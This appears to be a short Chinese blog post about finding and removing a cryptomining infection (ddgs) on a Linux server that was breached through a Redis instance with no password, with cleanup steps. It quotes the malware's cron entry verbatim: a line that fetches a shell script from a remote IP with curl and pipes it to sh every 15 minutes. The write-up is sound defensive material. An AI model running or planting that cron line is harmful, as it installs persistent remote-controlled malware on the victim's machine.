網站在運行期間感覺怪怪的,響應速度慢的不是一丁半點,帶寬5M,不該是這樣的呀 於是登錄Xshell 查看cpu情況如下 PID為3435的進程占用CPU過大,難道被病毒入侵了嗎? 查看該進程文件的絕對路徑 發現上述紅框文件,於是上網搜索了下,得治是挖礦病毒 處理辦法 1、刪除tmp目錄里的qW3xT ...
網站在運行期間感覺怪怪的,響應速度慢的不是一丁半點,帶寬5M,不該是這樣的呀
於是登錄Xshell
top命令
查看cpu情況如下
PID為3435的進程占用CPU過大,難道被病毒入侵了嗎?
查看該進程文件的絕對路徑
cd /proc/3435
發現上述紅框文件,於是上網搜索了下,得治是挖礦病毒
處理辦法
1、刪除tmp目錄里的qW3xT.2和ddgs.3013文件。
2、刪除定時任務crontab -l 查看是否有異常*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(與計劃任務相同) crontab -e 進入編輯 刪除異常任務。
3、進入var/spool/cron目錄,文件打開root文件查看是否有異常,刪除異常,再進crontabs文件里對root文件進行查看編輯,刪除異常定時任務並保存。
防止再次侵入病毒解決辦法
解決redis入口問題,因為最開始沒有設置密碼,所以首先修改redis.conf。設置密碼,然後重啟redis
到此也就解決了刪除了挖礦病毒問題。
感謝大家瀏覽到此處~~~~
